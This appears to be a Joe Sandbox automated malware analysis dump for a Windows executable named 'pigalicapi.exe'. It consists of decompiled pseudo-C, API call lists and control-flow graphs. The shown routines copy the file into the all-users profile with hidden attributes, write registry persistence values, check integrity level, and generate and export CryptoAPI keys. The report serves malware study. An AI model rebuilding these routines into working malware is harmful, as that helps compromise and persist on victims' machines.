                                                                                                                                                                                                                                                                          0x04003efa
                                                                                                                                                                                                                                                                          0x04003eff
                                                                                                                                                                                                                                                                          0x04003f07
                                                                                                                                                                                                                                                                          0x04003f78
                                                                                                                                                                                                                                                                          0x04003f09
                                                                                                                                                                                                                                                                          0x04003f09
                                                                                                                                                                                                                                                                          0x04003f22
                                                                                                                                                                                                                                                                          0x04003f43
                                                                                                                                                                                                                                                                          0x04003f48
                                                                                                                                                                                                                                                                          0x04003f50
                                                                                                                                                                                                                                                                          0x04003f52
                                                                                                                                                                                                                                                                          0x04003f52
                                                                                                                                                                                                                                                                          0x04003f60
                                                                                                                                                                                                                                                                          0x04003f70
                                                                                                                                                                                                                                                                          0x04003f70
                                                                                                                                                                                                                                                                          0x04003f76
                                                                                                                                                                                                                                                                          0x04003f7f
                                                                                                                                                                                                                                                                          0x04003f88
                                                                                                                                                                                                                                                                          0x04003f9a
                                                                                                                                                                                                                                                                          0x04003fa3
                                                                                                                                                                                                                                                                          0x04003fd7
                                                                                                                                                                                                                                                                          0x04003fd9
                                                                                                                                                                                                                                                                          0x04003fe3
                                                                                                                                                                                                                                                                          0x04003fe3
                                                                                                                                                                                                                                                                          0x04003fa5
                                                                                                                                                                                                                                                                          0x04003fac
                                                                                                                                                                                                                                                                          0x04003fc4
                                                                                                                                                                                                                                                                          0x04003fae
                                                                                                                                                                                                                                                                          0x04003fae
                                                                                                                                                                                                                                                                          0x04003fb8
                                                                                                                                                                                                                                                                          0x04003fb8
                                                                                                                                                                                                                                                                          0x04003fce
                                                                                                                                                                                                                                                                          0x04003fa3
                                                                                                                                                                                                                                                                          0x04003ff4
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x04003ff4

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\pigalicapi.exe,00000208), ref: 04003B2D
                                                                                                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(04005DB0), ref: 04003B38
                                                                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 04003B40
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: GetModuleFileNameA.KERNEL32(00000000,?,00000208), ref: 0400456C
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: CreateFileA.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0400458B
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: GetFileSize.KERNEL32(000000FF,00000000), ref: 040045AD
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 040045D6
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: ReadFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000), ref: 04004617
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0400463E
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040047C0
                                                                                                                                                                                                                                                                            • Part of subcall function 04004510: CloseHandle.KERNEL32(00000000), ref: 040047E0
                                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 0400400C
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetModuleFileNameA.KERNEL32(00000000,-00000100,00000104), ref: 04005742
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: lstrcpyA.KERNEL32(-0000043B,pigalicapi), ref: 040057B8
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetAllUsersProfileDirectoryA.USERENV(?,00000207), ref: 040057F1
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: wnsprintfA.SHLWAPI ref: 0400582F
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: CreateFileA.KERNEL32(-00000100,80000000,00000007,00000000,00000003,00000080,00000000), ref: 04005854
                                                                                                                                                                                                                                                                            • Part of subcall function 04005700: GetFileSize.KERNEL32(000000FF,00000000), ref: 0400586D
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcpyA.KERNEL32(Sscculmqcxgnq,WDefault), ref: 04005A47
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(0400C4E0), ref: 04005A7D
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcpyA.KERNEL32(00000000,0400C4E0), ref: 04005A97
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005AA1
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(Sscculmqcxgnq), ref: 04005AAE
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrcatA.KERNEL32(00000000,Sscculmqcxgnq), ref: 04005AC8
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: RegCreateKeyExA.KERNEL32(80000001,00000000,00000000,00000000,00000000,00020006,00000000,00000000,00000000), ref: 04005B00
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: RegCloseKey.KERNEL32(00000000), ref: 04005B0E
                                                                                                                                                                                                                                                                            • Part of subcall function 04005A00: lstrlenA.KERNEL32(00000000), ref: 04005B3B
                                                                                                                                                                                                                                                                            • Part of subcall function 04009400: lstrcpyA.KERNEL32(?,00000000), ref: 04009513
                                                                                                                                                                                                                                                                            • Part of subcall function 04009400: CharUpperA.USER32(?), ref: 04009521
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetCurrentProcess.KERNEL32(00000008,?), ref: 04009A0A
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: OpenProcessToken.ADVAPI32(00000000), ref: 04009A11
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00000000), ref: 04009A3A
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000400,00000400), ref: 04009A77
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: CreateWellKnownSid.ADVAPI32(0000000C,00000000,?,00000044), ref: 04009AAD
                                                                                                                                                                                                                                                                            • Part of subcall function 040099F0: EqualSid.ADVAPI32(?,00000000), ref: 04009AC3
                                                                                                                                                                                                                                                                            • Part of subcall function 04006060: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 04006082
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E00: CreateMutexA.KERNEL32(00000000,00000000,pigalicapi,?,04003BEB), ref: 04005E0C
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E00: GetLastError.KERNEL32(?,04003BEB), ref: 04005E12
                                                                                                                                                                                                                                                                          • StrStrIA.SHLWAPI(C:\Users\user\pigalicapi.exe,svchost.exe), ref: 04003BFA
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 04001148
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrlenA.KERNEL32(00000000), ref: 0400115A
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: GetAllUsersProfileDirectoryA.USERENV(?,00000104), ref: 04001182
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: wnsprintfA.SHLWAPI ref: 040011BD
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcmpiA.KERNEL32(00000104,?), ref: 040011D1
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: CopyFileA.KERNEL32(00000104,?,00000000), ref: 040011F0
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: SetFileAttributesA.KERNEL32(?,00000006), ref: 040011FF
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(00000104,?), ref: 04001210
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(00000000,?), ref: 04001249
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: lstrcpyA.KERNEL32(-00000208,00000000), ref: 0400125D
                                                                                                                                                                                                                                                                            • Part of subcall function 04001120: CreateThread.KERNEL32 ref: 04001274
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,000F003F,00000000), ref: 04005E7E
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005EB2
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegDeleteValueA.ADVAPI32(00000000,?), ref: 04005ED6
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 04005F0B
                                                                                                                                                                                                                                                                            • Part of subcall function 04005E30: RegCloseKey.KERNEL32(00000000), ref: 04005F19
                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegOpenKeyExA.KERNEL32(80000001,04013B88,00000000,000F003F,00000000), ref: 04006D30
                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegQueryValueExA.KERNEL32(00000000,04013FA6,00000000,00000003,?,00000020), ref: 04006D61
                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegDeleteValueA.ADVAPI32(00000000,04013FA6), ref: 04006D7E
                                                                                                                                                                                                                                                                            • Part of subcall function 04006CF0: RegCloseKey.ADVAPI32(00000000), ref: 04006D88
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: lstrcpyA.KERNEL32(?,pigalicapi), ref: 04005F67
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: lstrcatA.KERNEL32(?,04013FE2), ref: 04005F7A
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegOpenKeyExA.ADVAPI32(80000001,04003C58,00000000,000F003F,00000000), ref: 04005FB3
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegQueryValueExA.KERNEL32(00000000,?,00000000,00000000,?,00000020), ref: 04005FF2
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000003,?,00000010), ref: 0400603B
                                                                                                                                                                                                                                                                            • Part of subcall function 04005F30: RegCloseKey.ADVAPI32(00000000), ref: 04006045
                                                                                                                                                                                                                                                                          • WSAStartup.WS2_32(00000202,?), ref: 04003C85
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: InitializeCriticalSection.KERNEL32(?), ref: 04004066
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0400407A
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: EnterCriticalSection.KERNEL32(?,?), ref: 040040AF
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 040040C6
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: TerminateThread.KERNEL32(00000000,00000000), ref: 040040E6
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: ResetEvent.KERNEL32(00000000), ref: 040040F7
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: LeaveCriticalSection.KERNEL32(?), ref: 04004101
                                                                                                                                                                                                                                                                            • Part of subcall function 04004020: CreateThread.KERNEL32 ref: 04004118
                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 04003F70
                                                                                                                                                                                                                                                                          • Sleep.KERNEL32(?), ref: 04003FF4
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: File$Createlstrcpy$Value$Closelstrlen$ModuleNameOpenVirtual$CriticalFreeProcessQuerySectionThreadToken$DeleteDirectoryEventInformationInitializeProfileSizeUserslstrcatwnsprintf$AllocAttributesChangeCharCopyCurrentEnterEqualErrorExceptionExitFilterFindHandleKnownLastLeaveMutexNotificationReadResetSleepStartupTerminateUnhandledUpperWelllstrcmpi
                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\pigalicapi.exe$Kobucgekyxca$R+g$pigalicapi$svchost.exe
                                                                                                                                                                                                                                                                          • API String ID: 1389186475-3751886320
                                                                                                                                                                                                                                                                          • Opcode ID: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
                                                                                                                                                                                                                                                                          • Instruction ID: 63648f9aec36bb26e753af5ac432a688f143a616cbd4529da37374c18a699aed
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 936e491051d98ae6235cf02158d581c5c2971d700090c455091cf7b57a494376
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7EC11AB0944364AAF725DF64AC19BFA77B0AB04709F0480FDE6487A1E1DB7C6A84CF51
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 744 4008800-4008811 745 4008817-400881b 744->745 746 400895c-4008962 744->746 745->746 747 4008821-4008843 CryptAcquireContextA 745->747 748 4008845-4008855 GetLastError 747->748 749 400887a-400887e 747->749 750 4008860-4008874 CryptAcquireContextA 748->750 751 4008857-400885e 748->751 749->746 752 4008884-40088b7 CryptGenKey 749->752 750->749 751->749 751->750 753 4008950-4008956 CryptReleaseContext 752->753 754 40088bd-40088d7 CryptExportKey 752->754 753->746 755 4008946-400894a CryptDestroyKey 754->755 756 40088d9-40088dd 754->756 755->753 757 400893f 756->757 758 40088df-40088e3 756->758 757->755 758->757 759 40088e5-40088e9 758->759 759->757 760 40088eb-40088ef 759->760 760->757 761 40088f1-4008914 CryptImportKey 760->761 762 4008916-4008937 CryptExportKey CryptDestroyKey 761->762 763 400893d 761->763 762->763 763->755
                                                                                                                                                                                                                                                                          C-Code - Quality: 62%
                                                                                                                                                                                                                                                                          			E04008800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, BYTE* _a20, int _a24) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				long _v16;
                                                                                                                                                                                                                                                                          				long* _v20;
                                                                                                                                                                                                                                                                          				signed int _v24;
                                                                                                                                                                                                                                                                          				signed int _v28;
                                                                                                                                                                                                                                                                          				long* _v32;
                                                                                                                                                                                                                                                                          				char* _t41;
                                                                                                                                                                                                                                                                          				int _t42;
                                                                                                                                                                                                                                                                          				signed int _t43;
                                                                                                                                                                                                                                                                          				intOrPtr _t46;
                                                                                                                                                                                                                                                                          				int _t49;
                                                                                                                                                                                                                                                                          				int _t51;
                                                                                                                                                                                                                                                                          				char* _t71;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0) {
                                                                                                                                                                                                                                                                          					L19:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t41 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t42 = CryptAcquireContextA( &_v12, _t41, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t42 == 0) {
                                                                                                                                                                                                                                                                          						_v16 = GetLastError();
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t71 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							CryptAcquireContextA( &_v12, _t71, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						_v28 = 0x80;
                                                                                                                                                                                                                                                                          						_v20 = 0;
                                                                                                                                                                                                                                                                          						_v24 = _v28 << 0x00000010 | 0x00000001;
                                                                                                                                                                                                                                                                          						_t43 = _v24;
                                                                                                                                                                                                                                                                          						__imp__CryptGenKey(_v12, 0x6801, _t43,  &_v20);
                                                                                                                                                                                                                                                                          						if(_t43 != 0) {
                                                                                                                                                                                                                                                                          							_t46 = _a4;
                                                                                                                                                                                                                                                                          							__imp__CryptExportKey(_v20, 0, 8, 0, _t46, _a8);
                                                                                                                                                                                                                                                                          							if(_t46 != 0) {
                                                                                                                                                                                                                                                                          								if(_a12 == 0 || _a16 == 0 || _a20 == 0 || _a24 == 0) {
                                                                                                                                                                                                                                                                          									_v8 = 1;
                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                          									_v32 = 0;
                                                                                                                                                                                                                                                                          									_t49 = CryptImportKey(_v12, _a20, _a24, 0, 1,  &_v32); // executed
                                                                                                                                                                                                                                                                          									if(_t49 != 0) {
                                                                                                                                                                                                                                                                          										_t51 = _v20;
                                                                                                                                                                                                                                                                          										__imp__CryptExportKey(_t51, _v32, 1, 0, _a12, _a16); // executed
                                                                                                                                                                                                                                                                          										_v8 = _t51;
                                                                                                                                                                                                                                                                          										CryptDestroyKey(_v32);
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							CryptDestroyKey(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L19;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                                                          0x04008806
                                                                                                                                                                                                                                                                          0x04008811
                                                                                                                                                                                                                                                                          0x0400895c
                                                                                                                                                                                                                                                                          0x04008962
                                                                                                                                                                                                                                                                          0x04008821
                                                                                                                                                                                                                                                                          0x04008821
                                                                                                                                                                                                                                                                          0x04008831
                                                                                                                                                                                                                                                                          0x0400883b
                                                                                                                                                                                                                                                                          0x04008843
                                                                                                                                                                                                                                                                          0x0400884b
                                                                                                                                                                                                                                                                          0x04008855
                                                                                                                                                                                                                                                                          0x04008869
                                                                                                                                                                                                                                                                          0x04008874
                                                                                                                                                                                                                                                                          0x04008874
                                                                                                                                                                                                                                                                          0x04008855
                                                                                                                                                                                                                                                                          0x0400887e
                                                                                                                                                                                                                                                                          0x04008884
                                                                                                                                                                                                                                                                          0x0400888b
                                                                                                                                                                                                                                                                          0x0400889b
                                                                                                                                                                                                                                                                          0x040088a2
                                                                                                                                                                                                                                                                          0x040088af
                                                                                                                                                                                                                                                                          0x040088b7
                                                                                                                                                                                                                                                                          0x040088c1
                                                                                                                                                                                                                                                                          0x040088cf
                                                                                                                                                                                                                                                                          0x040088d7
                                                                                                                                                                                                                                                                          0x040088dd
                                                                                                                                                                                                                                                                          0x0400893f
                                                                                                                                                                                                                                                                          0x040088f1
                                                                                                                                                                                                                                                                          0x040088f1
                                                                                                                                                                                                                                                                          0x0400890c
                                                                                                                                                                                                                                                                          0x04008914
                                                                                                                                                                                                                                                                          0x04008926
                                                                                                                                                                                                                                                                          0x0400892a
                                                                                                                                                                                                                                                                          0x04008930
                                                                                                                                                                                                                                                                          0x04008937
                                                                                                                                                                                                                                                                          0x04008937
                                                                                                                                                                                                                                                                          0x0400893d
                                                                                                                                                                                                                                                                          0x040088dd
                                                                                                                                                                                                                                                                          0x0400894a
                                                                                                                                                                                                                                                                          0x0400894a
                                                                                                                                                                                                                                                                          0x04008956
                                                                                                                                                                                                                                                                          0x04008956
                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                          0x0400887e

                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,04008420,00000000,00001000,00000000), ref: 0400883B
                                                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 04008845
                                                                                                                                                                                                                                                                          • CryptAcquireContextA.ADVAPI32(00000000,0400C6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 04008874
                                                                                                                                                                                                                                                                          • CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 040088AF
                                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 040088CF
                                                                                                                                                                                                                                                                          • CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 0400890C
                                                                                                                                                                                                                                                                          • CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 0400892A
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(?), ref: 04008937
                                                                                                                                                                                                                                                                          • CryptDestroyKey.ADVAPI32(00000000), ref: 0400894A
                                                                                                                                                                                                                                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04008956
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 0400882C
                                                                                                                                                                                                                                                                          • Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 04008864
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.603215187.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603118352.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603533696.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.603602052.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Crypt$Context$AcquireDestroyExport$ErrorImportLastRelease
                                                                                                                                                                                                                                                                          • String ID: Microsoft Enhanced Cryptographic Provider v1.0$Microsoft Enhanced Cryptographic Provider v1.0
                                                                                                                                                                                                                                                                          • API String ID: 3052018297-947817771
                                                                                                                                                                                                                                                                          • Opcode ID: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                          • Instruction ID: e62ef6a9a3e861f5d7bfaf583d60d4f1649157d47df97182d85979e93aebb629
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a3ecfbe549d6a2009873a4562b9912e0752bd3a41684449d96c4f6673af668fd
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E641E972A00209EBFB54EF94C849BAE77B9FB44705F14C518F615B61C0C7B9AA84CF91
                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                          control_flow_graph 783 4008bb0-4008bc1 784 4008ce7-4008ced 783->784 785 4008bc7-4008bcb 783->785 785->784 786 4008bd1-4008bd5 785->786 786->784 787 4008bdb-4008bdf 786->787 787->784 788 4008be5-4008c07 CryptAcquireContextA 787->788 789 4008c09-4008c19 GetLastError 788->789 790 4008c3e-4008c42 788->790 791 4008c24-4008c38 CryptAcquireContextA 789->791 792 4008c1b-4008c22 789->792 790->784 793 4008c48-4008c61 CryptCreateHash 790->793 791->790 792->790 792->791 794 4008c63-4008c79 CryptHashData 793->794 795 4008cdb-4008ce1 CryptReleaseContext 793->795 796 4008cd1-4008cd5 CryptDestroyHash 794->796 797 4008c7b-4008ca1 CryptGetHashParam 794->797 795->784 796->795 797->796 798 4008ca3-4008ca9 797->798 798->796 799 4008cab-4008cc9 CryptGetHashParam 798->799 799->796 800 4008ccb-4008cce 799->800 800->796
                                                                                                                                                                                                                                                                          C-Code - Quality: 30%
                                                                                                                                                                                                                                                                          			E04008BB0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                                                          				int _v8;
                                                                                                                                                                                                                                                                          				long* _v12;
                                                                                                                                                                                                                                                                          				int _v16;
                                                                                                                                                                                                                                                                          				char _v20;
                                                                                                                                                                                                                                                                          				int _v24;
                                                                                                                                                                                                                                                                          				char _v28;
                                                                                                                                                                                                                                                                          				int _v32;
                                                                                                                                                                                                                                                                          				char* _t36;
                                                                                                                                                                                                                                                                          				int _t37;
                                                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                                                          				char* _t41;
                                                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                                                          				char* _t57;
                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                          					L17:
                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                          					_v12 = 0;
                                                                                                                                                                                                                                                                          					_t36 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          					_t37 = CryptAcquireContextA( &_v12, _t36, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 0); // executed
                                                                                                                                                                                                                                                                          					if(_t37 == 0) {
                                                                                                                                                                                                                                                                          						_t37 = GetLastError();
                                                                                                                                                                                                                                                                          						_v16 = _t37;
                                                                                                                                                                                                                                                                          						if(_v16 == 0x80090016 || _v16 == 0x8009000b) {
                                                                                                                                                                                                                                                                          							_t57 =  *0x4013370; // 0x400c6e4
                                                                                                                                                                                                                                                                          							_t37 = CryptAcquireContextA( &_v12, _t57, "Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					if(_v12 != 0) {
                                                                                                                                                                                                                                                                          						__imp__CryptCreateHash(_v12, 0x8003, 0, 0,  &_v20);
                                                                                                                                                                                                                                                                          						if(_t37 != 0) {
                                                                                                                                                                                                                                                                          							_t39 = _a8;
                                                                                                                                                                                                                                                                          							__imp__CryptHashData(_v20, _a4, _t39, 0);
                                                                                                                                                                                                                                                                          							if(_t39 != 0) {
                                                                                                                                                                                                                                                                          								_v24 = 0;
                                                                                                                                                                                                                                                                          								_v28 = 4;
                                                                                                                                                                                                                                                                          								_t41 =  &_v28;
                                                                                                                                                                                                                                                                          								__imp__CryptGetHashParam(_v20, 4,  &_v24, _t41, 0);
                                                                                                                                                                                                                                                                          								if(_t41 != 0 && _a16 >= _v24) {
                                                                                                                                                                                                                                                                          									_v32 = _a16;
                                                                                                                                                                                                                                                                          									_t43 = _a12;
                                                                                                                                                                                                                                                                          									__imp__CryptGetHashParam(_v20, 2, _t43,  &_v32, 0);
                                                                                                                                                                                                                                                                          									if(_t43 != 0) {
                                                                                                                                                                                                                                                                          										_v8 = _v32;
                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                          							__imp__CryptDestroyHash(_v20);
                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                          						CryptReleaseContext(_v12, 0);
                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                          					goto L17;
                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                          			}
















                                                                                                                                                                                                                                                                          0x04008bb6
                                                                                                                                                                                                                                                                          0x04008bc1
                                                                                                                                                                                                                                                                          0x04008ce7
                                                                                                                                                                                                                                                                          0x04008ced
                                                                                                                                                                                                                                                                          0x04008be5
                                                                                                                                                                                                                                                                          0x04008be5
                                                                                                                                                                                                                                                                          0x04008bf5
                                                                                                                                                                                                                                                                          0x04008bff
                                                                                                                                                                                                                                                                          0x04008c07
                                                                                                                                                                                                                                                                          0x04008c09
                                                                                                                                                                                                                                                                          0x04008c0f
                                                                                                                                                                                                                                                                          0x04008c19
                                                                                                                                                                                                                                                                          0x04008c2d
                                                                                                                                                                                                                                                                          0x04008c38
                                                                                                                                                                                                                                                                          0x04008c38
                                                                                                                                                                                                                                                                          0x04008c19
                                                                                                                                                                                                                                                                          0x04008c42
                                                                                                                                                                                                                                                                          0x04008c59
                                                                                                                                                                                                                                                                          0x04008c61
                                                                                                                                                                                                                                                                          0x04008c65
                                                                                                                                                                                                                                                                          0x04008c71
